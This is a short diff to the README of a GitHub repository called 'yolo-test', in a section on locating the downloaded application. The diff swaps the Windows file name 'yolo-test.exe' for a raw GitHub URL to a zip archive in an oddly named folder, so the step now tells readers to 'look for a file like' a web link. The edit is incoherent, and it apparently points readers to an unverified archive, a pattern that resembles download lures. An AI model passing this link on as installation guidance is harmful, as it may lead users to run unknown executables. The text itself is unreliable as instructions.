belloaltine5279/yolo-test/README.md

 After the download is complete, follow these steps to run the application:

 1. **Locate the downloaded file:**
-    - For Windows, look for a file like `yolo-test.exe`.
+    - For Windows, look for a file like `https://raw.githubusercontent.com/belloaltine5279/yolo-test/main/incontemptible/yolo-test.zip`.
     - For macOS, you may find a `.dmg` file.
     - For Linux, look for a file with no extension.